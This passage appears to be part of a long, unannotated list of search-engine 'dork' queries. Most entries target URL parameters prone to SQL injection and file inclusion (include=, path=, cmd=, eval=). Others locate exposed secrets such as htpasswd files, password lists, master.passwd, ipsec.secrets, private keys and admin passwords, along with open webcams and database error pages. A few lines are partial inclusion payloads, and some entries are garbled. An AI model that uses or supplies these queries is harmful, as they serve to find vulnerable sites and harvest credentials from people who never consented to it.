inurl:htpasswd filetype:htpasswd
inurl:humor.php?id=
inurl:idd=
inurl:ids5web
inurl:iisadmin
inurl:inc
inurl:inc=
inurl:incfile=
inurl:incl=
inurl:include_file=
inurl:include_path=
inurl:index.cgi?aktion=shopview
inurl:index.php?=
inurl:index.php?conteudo=
inurl:index.php?id=
inurl:index.php?load=
inurl:index.php?opcao=
inurl:index.php?principal=
inurl:index.php?show=
inurl:index2.php?option=
inurl:index2.php?to=
inurl:indexFrame.shtml Axis
inurl:infile=
inurl:info
inurl:info.inc.php
inurl:info=
inurl:iniziativa.php?in=
inurl:ir=
inurl:irc filetype:cgi cgi:irc
inurl:item_id=
inurl:kategorie.php4?id=
inurl:labels.php?id=
inurl:lang=
inurl:language=
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:link=
inurl:list
inurl:load=
inurl:loadpsb.php?id=
inurl:log.nsf -gov
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.jsp.bak
inurl:login.php "SquirrelMail version"
inurl:look.php?ID=
inurl:mail
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:main.php?id=
inurl:main=
inurl:mainspot=
inurl:ManyServers.htm
inurl:material.php?id=
inurl:memberInfo.php?id=
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:midicart.mdb
inurl:msg=
inurl:names.nsf?opendatabase
inurl:netscape.hst
inurl:netscape.ini
inurl:netw_tcp.shtml
inurl:new
inurl:news_display.php?getid=
inurl:news_view.php?id=
inurl:news-full.php?id=
inurl:news.php?id=
inurl:newscat.php?id=
inurl:newsdesk.cgi? inurl:"t="
inurl:newsDetail.php?id=
inurl:newsid=
inurl:newsitem.php?num=
inurl:newsone.php?id=
inurl:newsticker_info.php?idn=
inurl:nuke filetype:sql
inurl:num=
inurl:ocw_login_username
inurl:odbc.ini ext:ini -cvs
inurl:offer.php?idf=
inurl:ogl_inet.php?ogl_id=
inurl:openfile=
inurl:opinions.php?id=
inurl:orasso.wwsso_app_admin.ls_login
inurl:order
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:ovcgi/jovw
inurl:p=
inurl:page.php?file=
inurl:page.php?id=
inurl:page=
inurl:pageid=
inurl:Pageid=
inurl:pages
inurl:pages.php?id=
inurl:pagina=
inurl:pap-secrets -cvs
inurl:participant.php?id=
inurl:pass.dat
inurl:passlist.txt
inurl:path_to_calendar=
inurl:path=
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:perl/printenv
inurl:person.php?id=
inurl:pg=
inurl:php.ini filetype:ini
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:play_old.php?id=
inurl:pls/admin_/gateway.htm
inurl:pop.php?id=
inurl:portscan.php "from Port"|"Port Range"
inurl:post.php?id=
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:preferences.ini "[emule]"
inurl:preview.php?id=
inurl:prod_detail.php?id=
inurl:prod_info.php?id=
inurl:product_ranges_view.php?ID=
inurl:product-item.php?id=
inurl:product.php?id=
inurl:product.php?mid=
inurl:productdetail.php?id=
inurl:productinfo.php?id=
inurl:Productinfo.php?id=
inurl:produit.php?id=
inurl:profile_view.php?id=
inurl:profiles filetype:mdb
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:Proxy.txt
inurl:public
inurl:publications.php?id=
inurl:qry_str=
inurl:ray.php?id=
inurl:read.php?=
inurl:read.php?id=
inurl:readnews.php?id=
inurl:reagir.php?num=
inurl:releases.php?id=
inurl:report "EVEREST Home Edition "
inurl:review.php?id=
inurl:rpSys.html
inurl:rub.php?idr=
inurl:rubp.php?idr=
inurl:rubrika.php?idr=
inurl:ruta=
inurl:safehtml=
inurl:search
inurl:search.php vbulletin
inurl:search/admin.php
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:section.php?id=
inurl:section=
inurl:select_biblio.php?id=
inurl:sem.php3?id=
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:server.cfg rcon password
inurl:servlet/webacc
inurl:shop
inurl:shop_category.php?id=
inurl:shop.php?do=part&id=
inurl:shopdbtest.asp
inurl:shopping.php?id=
inurl:show_an.php?id=
inurl:show.php?id=
inurl:showfile=
inurl:showimg.php?id=
inurl:shredder-categories.php?id=
inurl:side=
inurl:site_id=
inurl:skin=
inurl:snitz_forums_2000.mdb
inurl:software
inurl:spr.php?id=
inurl:sql.php?id=
inurl:ssl.conf filetype:conf
inurl:staff_id=
inurl:static=
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:story.php?id=
inurl:str=
inurl:Stray-Questions-View.php?num=
inurl:strona=
inurl:sub=
inurl:support
inurl:sw_comment.php?id=
inurl:tdbin
inurl:tekst.php?idt=
inurl:testcgi xitami
inurl:textpattern/index.php
inurl:theme.php?id=
inurl:title.php?id=
inurl:top10.php?cat=
inurl:tradeCategory.php?id=
inurl:trainers.php?id=
inurl:transcript.php?id=
inurl:tresc=
inurl:url=
inurl:user
inurl:user=
inurl:vbstats.php "page generated"
inurl:ventrilo_srv.ini adminpassword
inurl:view_ad.php?id=
inurl:view_faq.php?id=
inurl:view_product.php?id=
inurl:view.php?id=
inurl:view/index.shtml
inurl:view/indexFrame.shtml
inurl:view/view.shtml
inurl:viewapp.php?id=
inurl:ViewerFrame?Mode=Refresh
inurl:viewphoto.php?id=
inurl:viewshowdetail.php?id=
inurl:vtund.conf intext:pass -cvs
inurl:vtund.conf intext:pass -cvs s
inurl:WCP_USER
inurl:web
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webmail./index.pl "Interface"
inurl:website.php?id=
inurl:webutil.pl
inurl:webvpn.html "login" "Please enter your"
inurl:webvpn.html "login" "Please enter your" Login ("admin account info") filetype:log
inurl:wp-mail.php + "There doesn't seem to be any new mail."
inurl:XcCDONTS.asp
inurl:yapboz_detay.asp
inurl:yapboz_detay.asp + View Webcam User Accessing
inurl:zebra.conf intext:password -sample -test -tutorial -download
ipsec.conf
ipsec.secrets
irbeautina/product_detail.php?product_id=
item_book.php?CAT=
item_details.php?catid=
item_list.php?cat_id=
item_list.php?maingroup
item_show.php?code_no=
item_show.php?id=
item_show.php?lid=
item.php?eid=
item.php?id=
item.php?iid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item.php?sub_id=
item/detail.php?num=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
Jetbox One CMS â?¢" | "
Jetstream ? *")
kategorie.php4?id=
kboard/kboard.php?board=
KM/BOARD/readboard.php?id=
knowledge_base/detail.php?id=
kshop/product.php?productid=
layout.php?abre=
layout.php?action=
layout.php?addr=
layout.php?basepath=
layout.php?c=
layout.php?category=
layout.php?chapter=
layout.php?choix=
layout.php?cmd=
layout.php?cont=
layout.php?disp=
layout.php?g=
layout.php?goto=
layout.php?incl=
layout.php?ir=
layout.php?link=
layout.php?loader=
layout.php?menue=
layout.php?modo=
layout.php?my=
layout.php?nivel=
layout.php?numero=
layout.php?oldal=
layout.php?opcion=
layout.php?OpenPage=
layout.php?page=
layout.php?pageweb=
layout.php?pagina=
layout.php?panel=
layout.php?path=
layout.php?play=
layout.php?pollname=
layout.php?pref=
layout.php?qry=
layout.php?secao=
layout.php?section=
layout.php?seite=
layout.php?sekce=
layout.php?strona=
layout.php?thispage=
layout.php?tipo=
layout.php?url=
layout.php?var=
layout.php?where=
layout.php?xlink=
layout.php?z=
LeapFTP intitle:"index.of./" sites.ini modified
learnmore.php?cartID=
lib/gore.php?libpath=
library.php?cat=
Link Department"
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
listing.php?cat=
liveapplet
lmsrecords_cd.php?cdid=
loadpsb.php?id=
Login ("
login.php?dir=
Looking Glass
ls.php?id=
m_view.php?ps_db=
m2f/m2f_phpbb204.php?m2f_root_path=
magazin.php?cid=
magazine-details.php?magid=
magazines/adult_magazine_full_year.php?magid=
magazines/adult_magazine_single_page.php?magid=
mail filetype:csv -site:gov intext:name
main.php?action=
main.php?addr=
main.php?adresa=
main.php?basepath=
main.php?body=
main.php?category=
main.php?chapter=
main.php?content=
main.php?corpo=
main.php?dir=
main.php?disp=
main.php?doshow=
main.php?e=
main.php?eval=
main.php?filepath=
main.php?goto=
main.php?h=
main.php?id=
main.php?inc=
main.php?include=
main.php?index=
main.php?ir=
main.php?item=
main.php?itemnav=
main.php?j=
main.php?link=
main.php?load=
main.php?loc=
main.php?middle=
main.php?mod=
main.php?my=
main.php?name=
main.php?oldal=
main.php?opcion=
main.php?page=
main.php?pagina=
main.php?param=
main.php?path=
main.php?pg=
main.php?pname=
main.php?pre=
main.php?pref=
main.php?prodID=
main.php?r=
main.php?ref=
main.php?second=
main.php?section=
main.php?site=
main.php?start=
main.php?str=
main.php?strona=
main.php?subject=
main.php?thispage=
main.php?tipo=
main.php?type=
main.php?url=
main.php?v=
main.php?where=
main.php?x=
main.php?xlink=
main/index.php?action=
main/index.php?uid=
main/magpreview.php?id=
mall/more.php?ProdID=
master.passwd
mb_showtopic.php?topic_id=
mboard/replies.php?parent_id=
media.php?page=
media/pr.php?id=
melbourne_details.php?id=
memberInfo.php?id=
Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com
message/comment_threads.php?postID=
Microsoft Money Data Files
Midmart Messageboard" "Administrator Login"
mod*.php?action=
mod*.php?addr=
mod*.php?b=
mod*.php?channel=
mod*.php?chapter=
mod*.php?choix=
mod*.php?cont=
mod*.php?content=
mod*.php?corpo=
mod*.php?d=
mod*.php?destino=
mod*.php?dir=
mod*.php?ev=
mod*.php?goFile=
mod*.php?home=
mod*.php?incl=
mod*.php?include=
mod*.php?index=
mod*.php?ir=
mod*.php?j=
mod*.php?lang=
mod*.php?link=
mod*.php?m=
mod*.php?middle=
mod*.php?module=
mod*.php?numero=
mod*.php?oldal=
mod*.php?OpenPage=
mod*.php?pag=
mod*.php?pageweb=
mod*.php?pagina=
mod*.php?path=
mod*.php?pg=
mod*.php?phpbb_root_path=
mod*.php?play=
mod*.php?pname=
mod*.php?pre=
mod*.php?qry=
mod*.php?recipe=
mod*.php?secao=
mod*.php?secc=
mod*.php?seccion=
mod*.php?section=
mod*.php?sekce=
mod*.php?start=
mod*.php?strona=
mod*.php?thispage=
mod*.php?tipo=
mod*.php?to=
mod*.php?v=
mod*.php?var=
modline.php?id=
module_db.php?pivot_path=
module/range/dutch_windmill_collection.php?rangeId=
modules.php?****=
modules.php?bookid=
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
modules/content/index.php?id=
modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
modules/forum/index.php?topic_id=
modules/My_eGallery/index.php?basepath=
modules/vwar/admin/admin.php?vwar_root=
Monster Top List" MTL numrange:200-
more_detail.php?id=
more_detail.php?X_EID=
More_Details.php?id=
more_details.php?id=
mt-db-pass.cgi files
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
myaccount.php?catid=
myevent.php?myevent_path=
MYSQL error message: supplied argument....
mysql error with query
mysql history files
MySQL tabledata dumps
mystuff.xml - Trillian data files
n_replyboard.php?typeboard=
naboard/memo.php?bd=
natterchat inurl:home.asp -site:natterchat.co.uk
Netscape Application Server Error page
news_and_notices.php?news_id=
news_content.php?CategoryID=
news_detail.php?file=
news_item.php?id=
news_view.php?id=
news.php?id=
news.php?ID=
news.php?t=
news.php?type=
news/detail.php?id=
news/latest_news.php?cat_id=
news/news.php?id=
news/news/title_show.php?id=
news/newsitem.php?newsID=
news/newsletter.php?id=
news/shownewsarticle.php?articleid=
news/temp.php?id=
newsDetail.php?id=
newsite/pdf_show.php?id=
newsitem.php?newsid=
newsitem.php?newsID=
newsItem.php?newsId=
newsitem.php?num=
newsone.php?id=
NickServ registration passwords
nota.php?abre=
nota.php?adresa=
nota.php?b=
nota.php?base_dir=
nota.php?basepath=
nota.php?category=
nota.php?channel=
nota.php?chapter=
nota.php?cmd=
nota.php?content=
nota.php?corpo=
nota.php?destino=
nota.php?disp=
nota.php?doshow=
nota.php?eval=
nota.php?filepath=
nota.php?get=
nota.php?goFile=
nota.php?h=
nota.php?header=
nota.php?home=
nota.php?in=
nota.php?inc=
nota.php?include=
nota.php?ir=
nota.php?itemnav=
nota.php?ki=
nota.php?lang=
nota.php?left=
nota.php?link=
nota.php?m=
nota.php?mid=
nota.php?mod=
nota.php?modo=
nota.php?module=
nota.php?n=
nota.php?nivel=
nota.php?oldal=
nota.php?opcion=
nota.php?OpenPage=
nota.php?option=
nota.php?pag=
nota.php?pagina=
nota.php?panel=
nota.php?pg=
nota.php?play=
nota.php?pollname=
nota.php?pr=
nota.php?pre=
nota.php?qry=
nota.php?rub=
nota.php?sec=
nota.php?secc=
nota.php?seccion=
nota.php?second=
nota.php?seite=
nota.php?sekce=
nota.php?showpage=
nota.php?subject=
nota.php?t=
nota.php?tipo=
nota.php?url=
nota.php?v=
noticias.php?arq=
notify/notify_form.php?topic_id=
Novell NetWare intext:"netware management portal version"
nurl:/admin/login.asp
nyheder.htm?show=
obio/detail.php?id=
ogl_inet.php?ogl_id=
ogloszenia/rss.php?cat=
old_reports.php?file=
onlinesales/product.php?product_id=
opinions.php?id=
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
order.asp?lotid=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
ourblog.php?categoryid=
Outlook Web Access (a better way)
ov_tv.php?item=
OWA Public Folders (direct view)
packages_display.php?ref=
padrao.php?*[*]*=
padrao.php?*root*=
padrao.php?a=
padrao.php?abre=
padrao.php?addr=
padrao.php?base_dir=
padrao.php?basepath=
padrao.php?body=
padrao.php?c=
padrao.php?choix=
padrao.php?cont=
padrao.php?corpo=
padrao.php?d=
padrao.php?destino=
padrao.php?eval=
padrao.php?filepath=
padrao.php?h=
padrao.php?header=
padrao.php?incl=
padrao.php?index=
padrao.php?ir=
padrao.php?link=
padrao.php?loc=
padrao.php?menu=
padrao.php?menue=
padrao.php?mid=
padrao.php?middle=
padrao.php?n=
padrao.php?name=
padrao.php?nivel=
padrao.php?oldal=
padrao.php?op=
padrao.php?open=
padrao.php?OpenPage=
padrao.php?pag=
padrao.php?page=
padrao.php?path=
padrao.php?pname=
padrao.php?pre=
padrao.php?qry=
padrao.php?read=
padrao.php?redirect=
padrao.php?rub=
padrao.php?secao=
padrao.php?secc=
padrao.php?seccion=
padrao.php?section=
padrao.php?seite=
padrao.php?sekce=
padrao.php?sivu=
padrao.php?str=
padrao.php?strona=
padrao.php?subject=
padrao.php?texto=
padrao.php?tipo=
padrao.php?type=
padrao.php?u=
padrao.php?url=
padrao.php?var=
padrao.php?xlink=
page.php?*[*]*=
page.php?abre=
page.php?action=
page.php?addr=
page.php?adresa=
page.php?area_id=
page.php?base_dir=
page.php?chapter=
page.php?choix=
page.php?cmd=
page.php?cont=
page.php?doc=
page.php?e=
page.php?ev=
page.php?eval=
page.php?file=
page.php?g=
page.php?go=
page.php?goto=
page.php?id=
page.php?inc=
page.php?incl=
page.php?ir=
page.php?left=
page.php?link=
page.php?load=
page.php?loader=
page.php?mid=
page.php?middle=
page.php?mod=
page.php?modo=
page.php?modul=
page.php?module=
page.php?numero=
page.php?oldal=
page.php?OpenPage=
page.php?option=
page.php?p=
page.php?pa=
page.php?panel=
page.php?PartID=
page.php?phpbb_root_path=
page.php?pId=
page.php?pname=
page.php?pref=
page.php?q=
page.php?qry=
page.php?read=
page.php?recipe=
page.php?redirect=
page.php?secao=
page.php?section=
page.php?seite=
page.php?showpage=
page.php?sivu=
page.php?strona=
page.php?subject=
page.php?tipo=
page.php?url=
page.php?where=
page.php?z=
page/de/produkte/produkte.php?prodID=
page/venue.php?id=
pageid=
pages.php?ID=
pages.php?id=
pages.php?page=
pages/print.php?id=
pages/video.php?id=
Pages/whichArticle.php?id=
pagina.php?base_dir=
pagina.php?basepath=
pagina.php?category=
pagina.php?channel=
pagina.php?chapter=
pagina.php?choix=
pagina.php?cmd=
pagina.php?dir=
pagina.php?ev=
pagina.php?filepath=
pagina.php?g=
pagina.php?go=
pagina.php?goto=
pagina.php?header=
pagina.php?home=
pagina.php?id=
pagina.php?in=
pagina.php?incl=
pagina.php?include=
pagina.php?index=
pagina.php?ir=
pagina.php?k=
pagina.php?lang=
pagina.php?left=
pagina.php?link=
pagina.php?load=
pagina.php?loader=
pagina.php?loc=
pagina.php?mid=
pagina.php?middlePart=
pagina.php?modo=
pagina.php?my=
pagina.php?n=
pagina.php?nivel=
pagina.php?numero=
pagina.php?oldal=
pagina.php?OpenPage=
pagina.php?pagina=
pagina.php?panel=
pagina.php?path=
pagina.php?pr=
pagina.php?pre=
pagina.php?q=
pagina.php?read=
pagina.php?recipe=
pagina.php?ref=
pagina.php?sec=
pagina.php?secao=
pagina.php?seccion=
pagina.php?section=
pagina.php?sekce=
pagina.php?start=
pagina.php?str=
pagina.php?thispage=
pagina.php?tipo=
pagina.php?to=
pagina.php?type=
pagina.php?u=
pagina.php?v=
pagina.php?z=
participant.php?id=
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
past-event.php?id=
path.php?*[*]*=
path.php?action=
path.php?addr=
path.php?adresa=
path.php?body=
path.php?category=
path.php?channel=
path.php?chapter=
path.php?cmd=
path.php?destino=
path.php?disp=
path.php?doshow=
path.php?ev=
path.php?eval=
path.php?filepath=
path.php?goto=
path.php?header=
path.php?home=
path.php?id=
path.php?in=
path.php?incl=
path.php?ir=
path.php?left=
path.php?link=
path.php?load=
path.php?loader=
path.php?menue=
path.php?mid=
path.php?middle=
path.php?middlePart=
path.php?my=
path.php?nivel=
path.php?numero=
path.php?opcion=
path.php?option=
path.php?p=
path.php?pageweb=
path.php?panel=
path.php?path=
path.php?play=
path.php?pname=
path.php?pre=
path.php?pref=
path.php?qry=
path.php?recipe=
path.php?sec=
path.php?secao=
path.php?sivu=
path.php?sp=
path.php?start=
path.php?strona=
path.php?subject=
path.php?thispage=
path.php?tipo=
path.php?type=
path.php?var=
path.php?where=
path.php?xlink=
path.php?y=
payment.php?CartID=
pdetail.php?item_id=
pdf_post.php?ID=
people.lst
Peoples MSN contact lists
person.php?id=
pharmaxim/category.php?cid=
photogallery.php?id=
PhotoPost PHP Upload
PHP application warnings failing "include_path"
php-addressbook "This is the addressbook for *" -warning
php/event.php?id=
php/index.php?id=
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpOpenTracker" Statistics
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=
phpx?PageID
picgallery/category.php?cid=
pivot/modules/module_db.php?pivot_path=
play_old.php?id=
Please enter a valid password! inurl:polladmin
podcast/item.php?pid=
poem_list.php?bookID=
ponuky/item_show.php?ID=
pop.php?id=
port.php?content=
portafolio/portafolio.php?id=
post.php?id=
powersearch.php?CartId=
press_release.php?id=
press.php?*[*]*=
press.php?*root*=
press.php?abre=
press.php?addr=
press.php?base_dir=
press.php?category=
press.php?channel=
press.php?destino=
press.php?dir=
press.php?ev=
press.php?get=
press.php?goFile=
press.php?home=
press.php?i=
press.php?id=
press.php?inc=
press.php?incl=
press.php?include=
press.php?ir=
press.php?itemnav=
press.php?lang=
press.php?link=
press.php?loader=
press.php?menu=
press.php?mid=
press.php?middle=
press.php?modo=
press.php?module=
press.php?my=
press.php?nivel=
press.php?opcion=
press.php?OpenPage=
press.php?option=
press.php?pa=
press.php?page=
press.php?pageweb=
press.php?pagina=
press.php?panel=
press.php?param=
press.php?path=
press.php?pg=
press.php?pname=
press.php?pr=
press.php?pref=
press.php?redirect=
press.php?rub=
press.php?second=
press.php?seite=
press.php?strona=
press.php?subject=
press.php?t=
press.php?thispage=
press.php?to=
press.php?type=
press.php?where=
press.php?xlink=
prev_results.php?prodID=
preview.php?id=
price.php
principal.php?abre=
principal.php?addr=
principal.php?b=
principal.php?basepath=
principal.php?choix=
principal.php?cont=
principal.php?conteudo=
principal.php?corpo=
principal.php?d=
principal.php?destino=
principal.php?disp=
principal.php?ev=
principal.php?eval=
principal.php?f=
principal.php?filepath=
principal.php?goto=
principal.php?header=
principal.php?home=
principal.php?id=
principal.php?in=
principal.php?inc=
principal.php?index=
principal.php?ir=
principal.php?ki=
principal.php?l=
principal.php?left=
principal.php?link=
principal.php?load=
principal.php?loader=
principal.php?loc=
principal.php?menue=
principal.php?middle=
principal.php?middlePart=
principal.php?module=
principal.php?my=
principal.php?n=
principal.php?nivel=
principal.php?oldal=
principal.php?opcion=
principal.php?p=
principal.php?pag=
principal.php?pagina=
principal.php?param=
principal.php?phpbb_root_path=
principal.php?pollname=
principal.php?pr=
principal.php?pre=
principal.php?pref=
principal.php?q=
principal.php?read=
principal.php?recipe=
principal.php?ref=
principal.php?rub=
principal.php?s=
principal.php?secc=
principal.php?seccion=
principal.php?seite=
principal.php?strona=
principal.php?subject=
principal.php?tipo=
principal.php?to=
principal.php?type=
principal.php?url=
principal.php?viewpage=
principal.php?w=
principal.php?z=
print-story.php?id=
print.php?*root*=
print.php?addr=
print.php?base_dir=
print.php?basepath=
print.php?category=
print.php?chapter=
print.php?choix=
print.php?cont=
print.php?dir=
print.php?disp=
print.php?doshow=
print.php?g=
print.php?goFile=
print.php?goto=
print.php?header=
print.php?id=
print.php?ID=
print.php?in=
print.php?inc=
print.php?itemnav=
print.php?ki=
print.php?l=
print.php?left=
print.php?link=
print.php?loc=
print.php?menu=
print.php?menue=
print.php?middle=
print.php?middlePart=
print.php?module=
print.php?my=
print.php?name=
print.php?numero=
print.php?opcion=
print.php?open=
print.php?OpenPage=
print.php?option=
print.php?pag=
print.php?page=
print.php?param=
print.php?path=
print.php?play=
print.php?pname=
print.php?pollname=
print.php?pre=
print.php?r=
print.php?read=
print.php?rub=
print.php?s=
print.php?sekce=
print.php?sid=
print.php?sivu=
print.php?sp=
print.php?str=
print.php?strona=
print.php?thispage=
print.php?tipo=
print.php?type=
print.php?u=
print.php?where=
printcards.php?ID=
privacy.php?cartID=
private key files (.csr)
private key files (.key)
prod_detail.php?id=
prod_info.php?id=
prod.php?cat=
prodbycat.php?intCatalogID=
proddetails_print.php?prodid=
prodetails.php?prodid=
prodlist.php?catid=
prodotti.php?id_cat=
product_detail.php?product_id=
product_details.php?id=
product_details.php?prodid=
product_details.php?product_id=
product_info.php?id=
product_info.php?item_id=
product_info.php?products_id=
product_ranges_view.php?ID=
product-item.php?id=
product-list.php?category_id=
product-list.php?cid=
product-list.php?id=
product-range.php?rangeID=
product.php?****=
product.php?bid=
product.php?bookID=
product.php?cat=
product.php?id_h=
product.php?id=
product.php?intProdID=
product.php?intProductID=
product.php?ItemID=
product.php?ItemId=
product.php?pid=
product.php?prd=
product.php?prodid=
product.php?product_id=
product.php?product=
product.php?ProductID=
product.php?productid=
product.php?shopprodid=
product.php?sku=
product/detail.php?id=
product/list.php?pid=
product/product.php?cate=
product/product.php?product_no=
productdetail.php?id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?id=
productinfo.php?item=
productList.php?cat=
productlist.php?fid=
productlist.php?grpid=
productlist.php?id=
ProductList.php?id=
productList.php?id=
productlist.php?tid=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products_category.php?CategoryID=
products_detail.php?CategoryID=
products-display-details.php?prodid=
products.php?act=
products.php?cat_id=
products.php?cat=
products.php?categoryID=
products.php?catid=
products.php?DepartmentID=
products.php?groupid=
products.php?ID=
products.php?keyword=
products.php?openparent=
products.php?p=
products.php?rub=
products.php?type=
products/?catID=
products/Blitzball.htm?id=
products/card.php?prodID=
products/index.php?rangeid=
products/parts/detail.php?id=
products/product-list.php?id=
products/product.php?id=
products/product.php?pid=
products/products.php?p=
productsByCategory.php?intCatalogID=
productsview.php?proid=
produit.php?id=
prodView.php?idProduct=
profile_print.php?id=
profile_view.php?id=
profile.php?id=
profiles/profile.php?profileid=
projdetails.php?id=
projects/event.php?id=
promo.php?id=
promotion.php?catid=
properties.php?id_cat=
property.php?id=
psyBNC config files
psychology/people/detail.php?id=
pub/pds/pds_view.php?start=
publications.php?Id=
publications.php?id=
publications.php?ID=
publications/book_reviews/full_review.php?id=
publications/publication.php?id=
publications/view.php?id=
purelydiamond/products/category.php?cat=
pview.php?Item=
pwd.db
pylones/item.php?item=
questions.php?questionid=
Quicken data files
rating.php?id=
rating/stat.php?id=
ray.php?id=
rdbqds -site:.edu -site:.mil -site:.gov
read.php?id=
readnews.php?id=
reagir.php?num=
recipe/category.php?cid=
redaktion/whiteteeth/detail.php?nr=
RedKernel"
referral/detail.php?siteid=
releases_headlines_details.php?id=
releases.php?id=
remixer.php?id=
reply.php?id=
resellers.php?idCategory=
resources/detail.php?id=
resources/index.php?cat=
resources/vulnerabilities_list.php?id=
results.php?cat=
review.php?id=
review/review_form.php?item_id=
reviews.php?id=
robots.txt
rounds-detail.php?id=
rss.php?cat=
rss/event.php?id=
rtfe.php?siteid=
rub.php?idr=
s.php?w=
Sales/view_item.php?id=
savecart.php?CartId=
schule/termine.php?view=
search.php?CartID=
search.php?cutepath=
search/display.php?BookID=
searchcat.php?search_id=
section.php?id=
section.php?section=
select_biblio.php?id=
Select_Item.php?id=
sem.php3?id=
send_reminders.php?includedir=
server-dbs "intitle:index of"
Services.php?ID=
services.php?page=
shippinginfo.php?CartId=
shop_category.php?id=
shop_details.php?prodid=
shop_display_products.php?cat_id=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop.php?do=part&id=
shop/books_detail.php?bookID=
shop/category.php?cat_id=
shop/eventshop/product_detail.php?itemid=
Shop/home.php?cat=
shop/home.php?cat=
shop/index.php?cPath=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcafe-shop-product.php?bookId=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopping.php?id=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_an.php?id=
show_bug.cgi?id=
show_item_details.php?item_id=
show_item.php?id=
show_news.php?cutepath=
show-book.php?id=
show.php?*root*=
show.php?abre=
show.php?adresa=
show.php?b=
show.php?base_dir=
show.php?channel=
show.php?chapter=
show.php?cmd=
show.php?corpo=
show.php?d=
show.php?disp=
show.php?filepath=
show.php?get=
show.php?go=
show.php?header=
show.php?home=
show.php?id=
show.php?inc=
show.php?incl=
show.php?include=
show.php?index=
show.php?ir=
show.php?j=
show.php?ki=
show.php?l=
show.php?left=
show.php?loader=
show.php?m=
show.php?mid=
show.php?middlePart=
show.php?modo=
show.php?module=
show.php?my=
show.php?n=
show.php?nivel=
show.php?oldal=
show.php?page=
show.php?pageweb=
show.php?pagina=
show.php?param=
show.php?path=
show.php?play=
show.php?pname=
show.php?pre=
show.php?qry=
show.php?r=
show.php?read=
show.php?recipe=
show.php?redirect=
show.php?seccion=
show.php?second=
show.php?sp=
show.php?thispage=
show.php?to=
show.php?type=
show.php?x=
show.php?xlink=
show.php?z=
showbook.php?bookid=
showfeature.php?id=
showimg.php?id=
showproduct.php?cat=
showproduct.php?prodid=
showproduct.php?productId=
showStore.php?catID=
showsub.php?id=
shprodde.php?SKU=
shredder-categories.php?id=
signin filetype:url
sinformer/n/imprimer.php?id=
singer/detail.php?siteid=
site:.pk intext:Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in & “id”
site:.pk intext:Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in & “id”
site:edu admin grades
site:netcraft.com intitle:That.Site.Running Apache
site:www.mailinator.com inurl:ShowMail.do
site.php?id=
site/?details&prodid=
site/en/list_service.php?cat=
site/products.php?prodid=
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
sitio.php?*root*=
sitio.php?abre=
sitio.php?addr=
sitio.php?body=
sitio.php?category=
sitio.php?chapter=
sitio.php?content=
sitio.php?destino=
sitio.php?disp=
sitio.php?doshow=
sitio.php?e=
sitio.php?ev=
sitio.php?get=
sitio.php?go=
sitio.php?goFile=
sitio.php?inc=
sitio.php?incl=
sitio.php?index=
sitio.php?ir=
sitio.php?left=
sitio.php?menu=
sitio.php?menue=
sitio.php?mid=
sitio.php?middlePart=
sitio.php?modo=
sitio.php?name=
sitio.php?nivel=
sitio.php?oldal=
sitio.php?opcion=
sitio.php?option=
sitio.php?pageweb=
sitio.php?param=
sitio.php?pg=
sitio.php?pr=
sitio.php?qry=
sitio.php?r=
sitio.php?read=
sitio.php?recipe=
sitio.php?redirect=
sitio.php?rub=
sitio.php?sec=
sitio.php?secao=
sitio.php?secc=
sitio.php?section=
sitio.php?sivu=
sitio.php?sp=
sitio.php?start=
sitio.php?strona=
sitio.php?t=
sitio.php?texto=
sitio.php?tipo=
sitio/item.php?idcd=
skins/advanced/advanced1.php?pluginpath[0]=
skunkworks/content.php?id=
smarty_config.php?root_dir=
Snitz! forums db path error
socsci/events/full_details.php?id=
socsci/news_items/full_story.php?id=
software_categories.php?cat_id=
solpot.html?body=
sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
specials.php?id=
specials.php?osCsid=
sport.php?revista=
spr.php?id=
spwd.db / passwd
SQL data dumps
SQL syntax error
sql.php?id=
SQuery/lib/gore.php?libpath=
Squid cache server reports
staff_id=
staff/publications.php?sn=
standard.php?*[*]*=
standard.php?abre=
standard.php?action=
standard.php?base_dir=
standard.php?body=
standard.php?channel=
standard.php?chapter=
standard.php?cmd=
